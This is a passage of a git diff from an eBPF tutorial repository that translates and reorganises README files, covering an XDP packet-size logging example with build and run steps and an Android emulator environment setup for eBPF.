kernel, allowing seamless interaction with the existing kernel network stack and tools (such as `iptables`, `nftables`, or sockets). There’s no need to reimplement networking protocols in user space. -- **安全性**:eBPF 虚拟机确保用户定义的 XDP 程序是被隔离的,不会对内核造成不稳定影响。eBPF 的安全模型防止恶意或有缺陷的代码损害系统,提供了一个安全的可编程数据包处理环境。 +- **Security**: The eBPF virtual machine (VM) ensures that user-defined XDP programs are sandboxed and constrained, which means they cannot destabilize the kernel. The security model of eBPF prevents malicious or buggy code from harming the system, providing a safe environment for programmable packet processing. -- **不需要专用 CPU**:XDP 允许数据包处理而无需将整个 CPU 核心专用于网络任务。这提高了系统的整体效率,允许更灵活的资源分配。 +- **No Dedicated CPUs Required**: XDP allows packet processing without dedicating entire CPU cores solely to network tasks. This improves the overall efficiency of the system, allowing for more flexible resource allocation. -总的来说,XDP + eBPF 提供了一种强大的可编程数据包处理解决方案,结合了高性能与内核集成的灵活性和安全性。它消除了完全绕过内核方案的缺点,同时保留了内核安全性和功能的优势。 +In summary, XDP + eBPF delivers a robust solution for programmable packet processing that combines high performance with the flexibility and safety of kernel integration. It eliminates the drawbacks of full kernel-bypass solutions while retaining the benefits of kernel security and functionality. -## XDP 的项目和应用案例 +## Projects and Use Cases with XDP -XDP 已经在许多高调的项目中得到应用,这些项目展示了它在实际网络场景中的强大功能和灵活性: +XDP is already being used in a number of high-profile projects that highlight its power and flexibility in real-world networking scenarios: ### 1. **Cilium** -- **描述**:Cilium 是一个为云原生环境(尤其是 Kubernetes)设计的开源网络、安全和可观测性工具。它利用 XDP 实现高性能的数据包过滤和负载均衡。 -- **应用案例**:Cilium 将数据包过滤和安全策略卸载到 XDP,实现高吞吐量和低延迟的容器化环境流量管理,同时不牺牲可扩展性。 -- **链接**:[Cilium](https://cilium.io/) +- **Description**: Cilium is an open-source networking, security, and observability tool designed for cloud-native environments, especially Kubernetes. It leverages XDP to implement high-performance packet filtering and load balancing. +- **Use Case**: Cilium offloads packet filtering and security policies to XDP, enabling high-throughput and low-latency traffic management in containerized environments without sacrificing scalability. +- **Link**: [Cilium](https://cilium.io/) ### 2. **Katran** -- **描述**:Katran 是由 Facebook 开发的第 4 层负载均衡器,优化了高可扩展性和性能。它使用 XDP 处理数据包转发,开销极小。 -- **应用案例**:Katran 每秒处理数百万个数据包,高效地将流量分配到后端服务器上,利用 XDP 在大规模数据中心中实现低延迟和高性能的负载均衡。 -- **链接**:[Katran GitHub](https://github.com/facebookincubator/katran) +- **Description**: Katran is a layer 4 load balancer developed by Facebook, optimized for high scalability and performance. It uses XDP to handle packet forwarding with minimal overhead. +- **Use Case**: Katran processes millions of packets per second to distribute traffic across backend servers efficiently, using XDP to achieve low-latency and high-performance load balancing in large-scale data centers. +- **Link**: [Katran GitHub](https://github.com/facebookincubator/katran) -### 3. **Cloudflare 的 XDP DDoS 保护** +### 3. **XDP DDoS Protection at Cloudflare** -- **描述**:Cloudflare 已经实现了基于 XDP 的实时 DDoS 缓解。通过在 NIC 级别处理数据包,Cloudflare 能够在恶意流量进入网络栈之前过滤掉攻击流量,最小化 DDoS 攻击对其系统的影响。 -- **应用案例**:Cloudflare 利用 XDP 在管道早期丢弃恶意数据包,保护其基础设施免受大规模 DDoS 攻击,同时保持对合法流量的高可用性。 -- **链接**:[Cloudflare 博客关于 XDP](https://blog.cloudflare.com/l4drop-xdp-ebpf-based-ddos-mitigations/) +- **Description**: Cloudflare has implemented XDP for real-time DDoS mitigation. By processing packets at the NIC level, Cloudflare can filter out attack traffic before it reaches the networking stack, minimizing the impact of DDoS attacks on their systems. +- **Use Case**: Cloudflare leverages XDP to drop malicious packets early in the pipeline, protecting their infrastructure from large-scale DDoS attacks while maintaining high availability for legitimate traffic. +- **Link**: [Cloudflare Blog on XDP](https://blog.cloudflare.com/l4drop-xdp-ebpf-based-ddos-mitigations/) -这些项目展示了 XDP 在不同领域的可扩展和高效的数据包处理能力,从安全和负载均衡到云原生网络。 +These projects demonstrate the real-world capabilities of XDP for scalable and efficient packet processing across different domains, from security and load balancing to cloud-native networking. -### 为什么选择 XDP 而不是其他方法? +### Why Use XDP Over Other Methods? -与传统方法(如 `iptables`、`nftables` 或 `tc`)相比,XDP 提供了几个明显的优势: +Compared to traditional methods like `iptables`, `nftables`, or `tc`, XDP offers several clear advantages: -- **速度与低开销**:XDP 直接在 NIC 驱动程序中运行,绕过了内核的大部分开销,使数据包处理更快。 +- **Speed and Low Overhead**: Operating directly in the NIC driver, XDP bypasses much of the kernel’s overhead, enabling faster packet processing. -- **可定制性**:XDP 允许开发人员通过 eBPF 创建自定义的数据包处理程序,提供比传统工具(如 `iptables`)更大的灵活性和细粒度控制。 +- **Customizability**: XDP allows developers to create custom packet-processing programs with eBPF, providing more flexibility and granularity than legacy tools like `iptables`. -- **资源效率**:XDP 不需要像 DPDK 等用户空间解决方案那样将整个 CPU 核心专用于数据包处理,因此它是高性能网络的更高效选择。 +- **Resource Efficiency**: XDP does not require dedicating entire CPU cores to packet processing, unlike user-space solutions like DPDK, making it a more efficient choice for high-performance networking. -## 编写 eBPF 程序 +## Writing your first XDP Program ```C #include "vmlinux.h" @@ -94,9 +96,9 @@ int xdp_pass(struct xdp_md* ctx) { char __license[] SEC("license") = "GPL"; ``` -这是一段 C 语言实现的 eBPF 内核侧代码,它能够通过 xdp 捕获所有经过目标网络设备的数据包,计算其大小并输出到 `trace_pipe` 中。 +This is a kernel-side eBPF code written in C. It captures all packets passing through the target network device using XDP, calculates their size, and outputs it to `trace_pipe`. -值得注意的是,在代码中我们使用了以下注释: +It's worth noting the following annotations in the code: ```C /// @ifindex 1 @@ -104,23 +106,23 @@ char __license[] SEC("license") = "GPL"; /// @xdpopts {"old_prog_fd":0} ``` -这是由 eunomia-bpf 提供的功能,我们可以通过这样的注释告知 eunomia-bpf 加载器此 xdp 程序想要挂载的目标网络设备编号,挂载的标志和选项。 +This functionality is provided by eunomia-bpf, which allows these annotations to inform the eunomia-bpf loader about the desired target network device number, mounting flags, and options for this XDP program. -这些变量的设计基于 libbpf 提供的 API,可以通过 [patchwork](https://patchwork.kernel.org/project/netdevbpf/patch/20220120061422.2710637-2-andrii@kernel.org/#24705508) 查看接口的详细介绍。 +These variables are based on the API provided by libbpf. Detailed information about the interface can be viewed [here](https://patchwork.kernel.org/project/netdevbpf/patch/20220120061422.2710637-2-andrii@kernel.org/#24705508). -`SEC("xdp")` 宏指出 BPF 程序的类型,`ctx` 是此 BPF 程序执行的上下文,用于包处理流程。 +The `SEC("xdp")` macro indicates the type of the BPF program, while `ctx` is the execution context of this BPF program for packet processing. -在程序的最后,我们返回了 `XDP_PASS`,这表示我们的 xdp 程序会将经过目标网络设备的包正常交付给内核的网络协议栈。可以通过 [XDP actions](https://prototype-kernel.readthedocs.io/en/latest/networking/XDP/implementation/xdp_actions.html) 了解更多 xdp 的处理动作。 +At the end of the program, we return `XDP_PASS`, signaling that our XDP program will deliver packets passing through the target network device to the kernel's network protocol stack as usual. For more on XDP actions, see [XDP actions](https://prototype-kernel.readthedocs.io/en/latest/networking/XDP/implementation/xdp_actions.html). -## 编译运行 +## Compilation and Execution -通过容器编译: +To compile using a container: ```console docker run -it -v `pwd`/:/src/ ghcr.io/eunomia-bpf/ecc-`uname -m`:latest ``` -或是通过 `ecc` 编译: +Or compile with `ecc`: ```console $ ecc xdp.bpf.c @@ -128,13 +130,13 @@ Compiling bpf object... Packing ebpf object and config into package.json... ``` -并通过 `ecli` 运行: +Then, run with `ecli`: ```console sudo ecli run package.json ``` -可以通过如下方式查看程序的输出: +To view the program's output: ```console $ sudo cat /sys/kernel/tracing/trace_pipe @@ -144,14 +146,18 @@ $ sudo cat /sys/kernel/tracing/trace_pipe node-1939 [000] d.s11 1601.275860: bpf_trace_printk: packet size is 344 ``` -## 总结 +## Conclusion -本文介绍了如何使用 xdp 来处理经过特定网络设备的包,基于 eunomia-bpf 提供的通过注释向 libbpf 传递参数的方案,我们可以将自己编写的 xdp BPF 程序以指定选项挂载到目标设备,并在网络包进入内核网络协议栈之前就对其进行处理,从而获取高性能的可编程包处理能力。 +This article introduces how to use XDP to process packets passing through a specific network device. With eunomia-bpf's annotation-based approach for passing parameters to libbpf, we can mount our custom XDP BPF program onto the target device with specified options. This allows packet processing even before they enter the kernel's network protocol stack, achieving high-performance programmable packet processing. -如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。 +For those interested in further exploring eBPF, visit our tutorial code repository at or website for more examples and a comprehensive guide. -## 参考资料 +## References + +For more information, you can refer to: - - - + +> The original link of this article: diff --git a/src/21-xdp/README.zh.md b/src/21-xdp/README.zh.md new file mode 100644 index 0000000..d6269fa --- /dev/null +++ b/src/21-xdp/README.zh.md @@ -0,0 +1,157 @@ +# eBPF 入门实践教程二十一: 使用 XDP 进行可编程数据包处理 + +在本教程中,我们将介绍 XDP(eXpress Data Path),并通过一个简单的例子帮助你入门。之后,我们将探讨更高级的 XDP 应用,例如负载均衡器、防火墙及其他实际应用。如果你对 eBPF 或 XDP 感兴趣,请在 [Github](https://github.com/eunomia-bpf/bpf-developer-tutorial) 上为我们点赞! + +## 什么是 XDP? + +XDP 是 Linux 内核中的一种高性能可编程数据路径,专为网络接口级的数据包处理而设计。通过将 eBPF 程序直接附加到网络设备驱动程序上,XDP 能够在数据包到达内核网络栈之前拦截并处理它们。这使得 XDP 能够进行极低延迟和高效的数据包处理,非常适合如 DDoS 防护、负载均衡和流量过滤等任务。实际上,XDP 每核心的吞吐量可以高达 **每秒 2400 万包(Mpps)**。 + +### 为什么选择 XDP? + +XDP 运行在比传统 Linux 网络组件(如 cBPF)更低的层级,在网络设备驱动程序的软中断上下文中执行。它能够在数据包被内核标准网络栈处理之前对其进行处理,避免了创建 Linux 中表示网络数据包的 `skb_buff` 结构。这种早期处理为简单但频繁的操作(如丢弃恶意数据包或负载均衡服务器)带来了显著的性能提升。 + +与其他数据包处理机制相比,XDP 在性能和可用性之间取得了平衡,它利用了 Linux 内核的安全性和可靠性,同时通过可编程的 eBPF 提供了灵活性。 + +## XDP 与其他方法的比较 + +在 XDP 出现之前,一些解决方案通过完全绕过内核来加速数据包处理。其中一个显著的例子是 **DPDK**(数据平面开发工具包)。DPDK 允许用户空间应用程序直接控制网络设备,从而实现非常高的性能。然而,这种方法也存在一些权衡: + +1. **缺乏内核集成**:DPDK 及其他内核绕过解决方案无法利用现有的内核网络功能,开发者必须在用户空间重新实现许多协议和功能。 + +2. **安全边界**:这些绕过技术破坏了内核的安全模型,使得难以利用内核提供的安全工具。 +3. **用户空间与内核的转换开销**:当用户空间数据包处理需要与传统内核网络交互时(例如基于套接字的应用程序),数据包必须重新注入到内核中,增加了开销和复杂性。 +4. **专用 CPU 使用**:为了处理高流量,DPDK 和类似解决方案通常需要专用的 CPU 核心来处理数据包,这限制了通用系统的可扩展性和效率。 + +另一个替代 XDP 的方法是使用 Linux 网络栈中的 **内核模块** 或 **挂钩**。虽然这种方法可以很好地集成现有的内核功能,但它需要大量的内核修改,且由于在数据包处理管道的后期运行,无法提供与 XDP 相同的性能优势。 + +### XDP + eBPF 的优势 + +XDP 与 eBPF 结合提供了介于内核绕过方案(如 DPDK)和内核集成方案之间的中间地带。以下是 XDP + eBPF 脱颖而出的原因: + +- **高性能**:通过在网络接口卡(NIC)驱动程序级别拦截数据包,XDP 可以实现接近线速的性能,用于丢弃、重定向或负载均衡数据包,同时保持低资源消耗。 + +- **内核集成**:与 DPDK 不同,XDP 在 Linux 内核中工作,允许与现有的内核网络栈和工具(如 `iptables`、`nftables` 或套接字)无缝交互。无需在用户空间重新实现网络协议。 + +- **安全性**:eBPF 虚拟机确保用户定义的 XDP 程序是被隔离的,不会对内核造成不稳定影响。eBPF 的安全模型防止恶意或有缺陷的代码损害系统,提供了一个安全的可编程数据包处理环境。 + +- **不需要专用 CPU**:XDP 允许数据包处理而无需将整个 CPU 核心专用于网络任务。这提高了系统的整体效率,允许更灵活的资源分配。 + +总的来说,XDP + eBPF 提供了一种强大的可编程数据包处理解决方案,结合了高性能与内核集成的灵活性和安全性。它消除了完全绕过内核方案的缺点,同时保留了内核安全性和功能的优势。 + +## XDP 的项目和应用案例 + +XDP 已经在许多高调的项目中得到应用,这些项目展示了它在实际网络场景中的强大功能和灵活性: + +### 1. **Cilium** + +- **描述**:Cilium 是一个为云原生环境(尤其是 Kubernetes)设计的开源网络、安全和可观测性工具。它利用 XDP 实现高性能的数据包过滤和负载均衡。 +- **应用案例**:Cilium 将数据包过滤和安全策略卸载到 XDP,实现高吞吐量和低延迟的容器化环境流量管理,同时不牺牲可扩展性。 +- **链接**:[Cilium](https://cilium.io/) + +### 2. **Katran** + +- **描述**:Katran 是由 Facebook 开发的第 4 层负载均衡器,优化了高可扩展性和性能。它使用 XDP 处理数据包转发,开销极小。 +- **应用案例**:Katran 每秒处理数百万个数据包,高效地将流量分配到后端服务器上,利用 XDP 在大规模数据中心中实现低延迟和高性能的负载均衡。 +- **链接**:[Katran GitHub](https://github.com/facebookincubator/katran) + +### 3. **Cloudflare 的 XDP DDoS 保护** + +- **描述**:Cloudflare 已经实现了基于 XDP 的实时 DDoS 缓解。通过在 NIC 级别处理数据包,Cloudflare 能够在恶意流量进入网络栈之前过滤掉攻击流量,最小化 DDoS 攻击对其系统的影响。 +- **应用案例**:Cloudflare 利用 XDP 在管道早期丢弃恶意数据包,保护其基础设施免受大规模 DDoS 攻击,同时保持对合法流量的高可用性。 +- **链接**:[Cloudflare 博客关于 XDP](https://blog.cloudflare.com/l4drop-xdp-ebpf-based-ddos-mitigations/) + +这些项目展示了 XDP 在不同领域的可扩展和高效的数据包处理能力,从安全和负载均衡到云原生网络。 + +### 为什么选择 XDP 而不是其他方法? + +与传统方法(如 `iptables`、`nftables` 或 `tc`)相比,XDP 提供了几个明显的优势: + +- **速度与低开销**:XDP 直接在 NIC 驱动程序中运行,绕过了内核的大部分开销,使数据包处理更快。 + +- **可定制性**:XDP 允许开发人员通过 eBPF 创建自定义的数据包处理程序,提供比传统工具(如 `iptables`)更大的灵活性和细粒度控制。 + +- **资源效率**:XDP 不需要像 DPDK 等用户空间解决方案那样将整个 CPU 核心专用于数据包处理,因此它是高性能网络的更高效选择。 + +## 编写 eBPF 程序 + +```C +#include "vmlinux.h" +#include + +/// @ifindex 1 +/// @flags 0 +/// @xdpopts {"old_prog_fd":0} +SEC("xdp") +int xdp_pass(struct xdp_md* ctx) { + void* data = (void*)(long)ctx->data; + void* data_end = (void*)(long)ctx->data_end; + int pkt_sz = data_end - data; + + bpf_printk("packet size is %d", pkt_sz); + return XDP_PASS; +} + +char __license[] SEC("license") = "GPL"; +``` + +这是一段 C 语言实现的 eBPF 内核侧代码,它能够通过 xdp 捕获所有经过目标网络设备的数据包,计算其大小并输出到 `trace_pipe` 中。 + +值得注意的是,在代码中我们使用了以下注释: + +```C +/// @ifindex 1 +/// @flags 0 +/// @xdpopts {"old_prog_fd":0} +``` + +这是由 eunomia-bpf 提供的功能,我们可以通过这样的注释告知 eunomia-bpf 加载器此 xdp 程序想要挂载的目标网络设备编号,挂载的标志和选项。 + +这些变量的设计基于 libbpf 提供的 API,可以通过 [patchwork](https://patchwork.kernel.org/project/netdevbpf/patch/20220120061422.2710637-2-andrii@kernel.org/#24705508) 查看接口的详细介绍。 + +`SEC("xdp")` 宏指出 BPF 程序的类型,`ctx` 是此 BPF 程序执行的上下文,用于包处理流程。 + +在程序的最后,我们返回了 `XDP_PASS`,这表示我们的 xdp 程序会将经过目标网络设备的包正常交付给内核的网络协议栈。可以通过 [XDP actions](https://prototype-kernel.readthedocs.io/en/latest/networking/XDP/implementation/xdp_actions.html) 了解更多 xdp 的处理动作。 + +## 编译运行 + +通过容器编译: + +```console +docker run -it -v `pwd`/:/src/ ghcr.io/eunomia-bpf/ecc-`uname -m`:latest +``` + +或是通过 `ecc` 编译: + +```console +$ ecc xdp.bpf.c +Compiling bpf object... +Packing ebpf object and config into package.json... +``` + +并通过 `ecli` 运行: + +```console +sudo ecli run package.json +``` + +可以通过如下方式查看程序的输出: + +```console +$ sudo cat /sys/kernel/tracing/trace_pipe + node-1939 [000] d.s11 1601.190413: bpf_trace_printk: packet size is 177 + node-1939 [000] d.s11 1601.190479: bpf_trace_printk: packet size is 66 + ksoftirqd/1-19 [001] d.s.1 1601.237507: bpf_trace_printk: packet size is 66 + node-1939 [000] d.s11 1601.275860: bpf_trace_printk: packet size is 344 +``` + +## 总结 + +本文介绍了如何使用 xdp 来处理经过特定网络设备的包,基于 eunomia-bpf 提供的通过注释向 libbpf 传递参数的方案,我们可以将自己编写的 xdp BPF 程序以指定选项挂载到目标设备,并在网络包进入内核网络协议栈之前就对其进行处理,从而获取高性能的可编程包处理能力。 + +如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。 + +## 参考资料 + +- +- +- diff --git a/src/21-xdp/README_en.md b/src/21-xdp/README_en.md deleted file mode 100644 index ef6928c..0000000 --- a/src/21-xdp/README_en.md +++ /dev/null @@ -1,163 +0,0 @@ -# eBPF Tutorial by Example 21: Programmable Packet Processing with XDP - -In this tutorial, we will introduce XDP (eXpress Data Path) and walk through a small example to help you get started. Later on, we will explore more advanced XDP applications, such as load balancers, firewalls, and other real-world use cases. Please give us a start on [Github](https://github.com/eunomia-bpf/bpf-developer-tutorial) if you are interested in eBPF or XDP! - -## What is XDP? - -XDP is a high-performance, programmable data path in the Linux kernel, designed for packet processing at the network interface level. By attaching eBPF programs directly to network device drivers, XDP can intercept and handle packets before they reach the kernel’s networking stack. This allows for extremely low-latency and efficient packet processing, making it ideal for tasks like DDoS defense, load balancing, and traffic filtering. In fact, XDP can achieve throughput as high as **24 million packets per second (Mpps) per core**. - -### Why XDP? - -XDP operates at a lower level than traditional Linux networking components, like cBPF (Classic BPF), by running inside the soft interrupt context of the network device driver. It can handle packets before they are even processed by the kernel's standard networking stack, bypassing the creation of the `skb_buff` structure, which represents network packets in Linux. This early-stage processing provides significant performance gains for simple but frequent operations like dropping malicious packets or load balancing across servers. - -Compared to other packet processing mechanisms, XDP strikes a balance between performance and usability, leveraging the security and reliability of the Linux kernel while providing flexibility through programmable eBPF. - -## Overview of XDP vs. Other Approaches - -Before XDP, several other solutions aimed to accelerate packet processing by bypassing the kernel entirely. One prominent example is **DPDK** (Data Plane Development Kit). DPDK allows user-space applications to take direct control of network devices, achieving very high performance. However, this approach comes with trade-offs: - -1. **Lack of Kernel Integration**: DPDK and other kernel-bypass solutions cannot utilize existing kernel networking features, requiring developers to reimplement many protocols and functions in user space. - -2. **Security Boundaries**: These bypass techniques break the kernel’s security model, making it harder to leverage security tools provided by the kernel. - -3. **User-Kernel Transition Costs**: When user-space packet processing needs to interact with traditional kernel networking (like socket-based applications), packets must be reinjected into the kernel, adding overhead and complexity. - -4. **Dedicated CPU Usage**: To handle high traffic, DPDK and similar solutions often require dedicating one or more CPU cores solely for packet processing, which limits the scalability and efficiency of general-purpose systems. - -Another alternative to XDP is using **kernel modules** or **hooks** in the Linux networking stack. While this method integrates well with existing kernel features, it requires extensive kernel modifications and does not provide the same performance benefits, as it operates later in the packet processing pipeline. - -### The XDP + eBPF Advantage - -XDP combined with eBPF offers a middle ground between kernel-bypass solutions like DPDK and kernel-integrated solutions. Here’s why XDP + eBPF stands out: - -- **High Performance**: By intercepting packets early at the NIC driver level, XDP achieves near-line rate performance for tasks like dropping, redirecting, or load balancing packets, all while keeping resource usage low. - -- **Kernel Integration**: Unlike DPDK, XDP works within the Linux kernel, allowing seamless interaction with the existing kernel network stack and tools (such as `iptables`, `nftables`, or sockets). There’s no need to reimplement networking protocols in user space. - -- **Security**: The eBPF virtual machine (VM) ensures that user-defined XDP programs are sandboxed and constrained, which means they cannot destabilize the kernel. The security model of eBPF prevents malicious or buggy code from harming the system, providing a safe environment for programmable packet processing. - -- **No Dedicated CPUs Required**: XDP allows packet processing without dedicating entire CPU cores solely to network tasks. This improves the overall efficiency of the system, allowing for more flexible resource allocation. - -In summary, XDP + eBPF delivers a robust solution for programmable packet processing that combines high performance with the flexibility and safety of kernel integration. It eliminates the drawbacks of full kernel-bypass solutions while retaining the benefits of kernel security and functionality. - -## Projects and Use Cases with XDP - -XDP is already being used in a number of high-profile projects that highlight its power and flexibility in real-world networking scenarios: - -### 1. **Cilium** - -- **Description**: Cilium is an open-source networking, security, and observability tool designed for cloud-native environments, especially Kubernetes. It leverages XDP to implement high-performance packet filtering and load balancing. -- **Use Case**: Cilium offloads packet filtering and security policies to XDP, enabling high-throughput and low-latency traffic management in containerized environments without sacrificing scalability. -- **Link**: [Cilium](https://cilium.io/) - -### 2. **Katran** - -- **Description**: Katran is a layer 4 load balancer developed by Facebook, optimized for high scalability and performance. It uses XDP to handle packet forwarding with minimal overhead. -- **Use Case**: Katran processes millions of packets per second to distribute traffic across backend servers efficiently, using XDP to achieve low-latency and high-performance load balancing in large-scale data centers. -- **Link**: [Katran GitHub](https://github.com/facebookincubator/katran) - -### 3. **XDP DDoS Protection at Cloudflare** - -- **Description**: Cloudflare has implemented XDP for real-time DDoS mitigation. By processing packets at the NIC level, Cloudflare can filter out attack traffic before it reaches the networking stack, minimizing the impact of DDoS attacks on their systems. -- **Use Case**: Cloudflare leverages XDP to drop malicious packets early in the pipeline, protecting their infrastructure from large-scale DDoS attacks while maintaining high availability for legitimate traffic. -- **Link**: [Cloudflare Blog on XDP](https://blog.cloudflare.com/l4drop-xdp-ebpf-based-ddos-mitigations/) - -These projects demonstrate the real-world capabilities of XDP for scalable and efficient packet processing across different domains, from security and load balancing to cloud-native networking. - -### Why Use XDP Over Other Methods? - -Compared to traditional methods like `iptables`, `nftables`, or `tc`, XDP offers several clear advantages: - -- **Speed and Low Overhead**: Operating directly in the NIC driver, XDP bypasses much of the kernel’s overhead, enabling faster packet processing. - -- **Customizability**: XDP allows developers to create custom packet-processing programs with eBPF, providing more flexibility and granularity than legacy tools like `iptables`. - -- **Resource Efficiency**: XDP does not require dedicating entire CPU cores to packet processing, unlike user-space solutions like DPDK, making it a more efficient choice for high-performance networking. - -## Writing your first XDP Program - -```C -#include "vmlinux.h" -#include - -/// @ifindex 1 -/// @flags 0 -/// @xdpopts {"old_prog_fd":0} -SEC("xdp") -int xdp_pass(struct xdp_md* ctx) { - void* data = (void*)(long)ctx->data; - void* data_end = (void*)(long)ctx->data_end; - int pkt_sz = data_end - data; - - bpf_printk("packet size is %d", pkt_sz); - return XDP_PASS; -} - -char __license[] SEC("license") = "GPL"; -``` - -This is a kernel-side eBPF code written in C. It captures all packets passing through the target network device using XDP, calculates their size, and outputs it to `trace_pipe`. - -It's worth noting the following annotations in the code: - -```C -/// @ifindex 1 -/// @flags 0 -/// @xdpopts {"old_prog_fd":0} -``` - -This functionality is provided by eunomia-bpf, which allows these annotations to inform the eunomia-bpf loader about the desired target network device number, mounting flags, and options for this XDP program. - -These variables are based on the API provided by libbpf. Detailed information about the interface can be viewed [here](https://patchwork.kernel.org/project/netdevbpf/patch/20220120061422.2710637-2-andrii@kernel.org/#24705508). - -The `SEC("xdp")` macro indicates the type of the BPF program, while `ctx` is the execution context of this BPF program for packet processing. - -At the end of the program, we return `XDP_PASS`, signaling that our XDP program will deliver packets passing through the target network device to the kernel's network protocol stack as usual. For more on XDP actions, see [XDP actions](https://prototype-kernel.readthedocs.io/en/latest/networking/XDP/implementation/xdp_actions.html). - -## Compilation and Execution - -To compile using a container: - -```console -docker run -it -v `pwd`/:/src/ ghcr.io/eunomia-bpf/ecc-`uname -m`:latest -``` - -Or compile with `ecc`: - -```console -$ ecc xdp.bpf.c -Compiling bpf object... -Packing ebpf object and config into package.json... -``` - -Then, run with `ecli`: - -```console -sudo ecli run package.json -``` - -To view the program's output: - -```console -$ sudo cat /sys/kernel/tracing/trace_pipe - node-1939 [000] d.s11 1601.190413: bpf_trace_printk: packet size is 177 - node-1939 [000] d.s11 1601.190479: bpf_trace_printk: packet size is 66 - ksoftirqd/1-19 [001] d.s.1 1601.237507: bpf_trace_printk: packet size is 66 - node-1939 [000] d.s11 1601.275860: bpf_trace_printk: packet size is 344 -``` - -## Conclusion - -This article introduces how to use XDP to process packets passing through a specific network device. With eunomia-bpf's annotation-based approach for passing parameters to libbpf, we can mount our custom XDP BPF program onto the target device with specified options. This allows packet processing even before they enter the kernel's network protocol stack, achieving high-performance programmable packet processing. - -For those interested in further exploring eBPF, visit our tutorial code repository at or website for more examples and a comprehensive guide. - -## References - -For more information, you can refer to: - -- -- -- - -> The original link of this article: diff --git a/src/22-android/README.md b/src/22-android/README.md index 07d7114..f1f660b 100644 --- a/src/22-android/README.md +++ b/src/22-android/README.md @@ -1,69 +1,68 @@ -# 在 Android 上使用 eBPF 程序 +# eBPF Tutorial by Example: Using eBPF Programs on Android -> 本文主要记录了笔者在 Android Studio Emulator 中测试高版本 Android Kernel 对基于 libbpf 的 CO-RE 技术支持程度的探索过程、结果和遇到的问题。 -> 测试采用的方式是在 Android Shell 环境下构建 Debian 环境,并基于此尝试构建 eunomia-bpf 工具链、运行其测试用例。 +> This article mainly documents the author's exploration process, results, and issues encountered while testing the level of support for CO-RE technology based on the libbpf library on high version Android kernels in the Android Studio Emulator. +> The test was conducted by building a Debian environment in the Android Shell environment and attempting to build the eunomia-bpf toolchain and run its test cases based on this. -## 背景 +## Background -截至目前(2023-04),Android 还未对 eBPF 程序的动态加载做出较好的支持,无论是以 bcc 为代表的带编译器分发方案,还是基于 btf 和 libbpf 的 CO-RE 方案,都在较大程度上离不开 Linux 环境的支持,无法在 Android 系统上很好地运行[^WeiShu]。 +As of now (2023-04), Android has not provided good support for dynamic loading of eBPF programs. Both the compiler distribution scheme represented by bcc and the CO-RE scheme based on btf and libbpf rely heavily on Linux environment support and cannot run well on the Android system.[^WeiShu] -虽然如此,在 Android 平台上尝试 eBPF 也已经有了一些成功案例,除谷歌官方提供的修改 `Android.bp` 以将 eBPF 程序随整个系统一同构建并挂载的方案[^Google],也有人提出基于 Android 内核构建 Linux 环境进而运行 eBPF 工具链的思路,并开发了相关工具。 +However, there have been some successful cases of trying eBPF on the Android platform. In addition to the solution provided by Google to modify `Android.bp` to build and mount eBPF programs with the entire system[^Google], some people have proposed building a Linux environment based on the Android kernel and running the eBPF toolchain using this approach, and have developed related tools. -目前已有的资料,大多基于 adeb/eadb 在 Android 内核基础上构建 Linux 沙箱,并对 bcc 和 bpftrace 相关工具链进行测试,而对 CO-RE 方案的测试工作较少。在 Android 上使用 bcc 工具目前有较多参考资料,如: +Currently available information mostly focuses on the testing of bcc and bpftrace toolchains based on the adeb/eadb sandbox built on the Android kernel, with less testing work on the CO-RE scheme. There is more reference material available for using the bcc tool on Android, such as: -+ SeeFlowerX: -+ evilpan: ++ SeeFlowerX: ++ evilpan: -其主要思路是利用 chroot 在 Android 内核上运行一个 Debian 镜像,并在其中构建整个 bcc 工具链,从而使用 eBPF 工具。如果想要使用 bpftrace,原理也是类似的。 +The main idea is to use chroot to run a Debian image on the Android kernel and build the entire bcc toolchain within it in order to use eBPF tools. The same principle applies to using bpftrace. -事实上,高版本的 Android 内核已支持 btf 选项,这意味着 eBPF 领域中新兴的 CO-RE 技术也应当能够运用到基于 Android 内核的 Linux 系统中。本文将基于此对 eunomia-bpf 在模拟器环境下进行测试运行。 +In fact, higher versions of the Android kernel already support the btf option, which means that the emerging CO-RE technology in the eBPF field should also be applicable to Linux systems based on the Android kernel. This article will test and run eunomia-bpf in the emulator environment based on this. -> [eunomia-bpf](https://github.com/eunomia-bpf/eunomia-bpf) 是一个结合了 libbpf 和 WebAssembly 技术的开源项目,旨在简化 eBPF 程序的编写、编译和部署。该项目可被视作 CO-RE 的一种实践方式,其核心依赖是 libbpf,相信对 eunomia-bpf 的测试工作能够为其他 CO-RE 方案提供参考。 +> [eunomia-bpf](https://github.com/eunomia-bpf/eunomia-bpf) is an open-source project that combines libbpf and WebAssembly technology, aiming to simplify the writing, compilation, and deployment of eBPF programs. This project can be seen as a practical way of implementing CO-RE, with libbpf as its core dependency. It is believed that the testing work of eunomia-bpf can provide reference for other CO-RE schemes. -## 测试环境 +## Test Environment -+ Android Emulator(Android Studio Flamingo | 2022.2.1) ++ Android Emulator (Android Studio Flamingo | 2022.2.1) + AVD: Pixel 6 -+ Android Image: Tiramisu Android 13.0 x86_64(5.15.41-android13-8-00055-g4f5025129fe8-ab8949913) ++ Android Image: Tiramisu Android 13.0 x86_64 (5.15.41-android13-8-00055-g4f5025129fe8-ab8949913) -## 环境搭建[^SeeFlowerX] +## Environment Setup[^SeeFlowerX] -1. 从 [eadb 仓库](https://github.com/tiann/eadb) 的 releases 页面获取 `debianfs-amd64-full.tar.gz` 作为 Linux 环境的 rootfs,同时还需要获取该项目的 `assets` 目录来构建环境; -2. 从 Android Studio 的 Device Manager 配置并启动 Android Virtual Device; -3. 通过 Android Studio SDK 的 adb 工具将 `debianfs-amd64-full.tar.gz` 和 `assets` 目录推送到 AVD 中: +1. Obtain `debianfs-amd64-full.tar.gz` from the releases page of the [eadb repository](https://github.com/tiann/eadb) as the rootfs of the Linux environment. Also, get the `assets` directory from this project to build the environment. +2. Configure and start the Android Virtual Device in the Android Studio Device Manager. +3. Push `debianfs-amd64-full.tar.gz` and the `assets` directory to the AVD using the adb tool from the Android Studio SDK: + `./adb push debianfs-amd64-full.tar.gz /data/local/tmp/deb.tar.gz` + `./adb push assets /data/local/tmp/assets` -4. 通过 adb 进入 Android shell 环境并获取 root 权限: +4. Use adb to enter the Android shell environment and obtain root permissions: + `./adb shell` + `su` -5. 在 Android shell 中构建并进入 debian 环境: +5. Build and enter the debian environment in the Android shell: + `mkdir -p /data/eadb` + `mv /data/local/tmp/assets/* 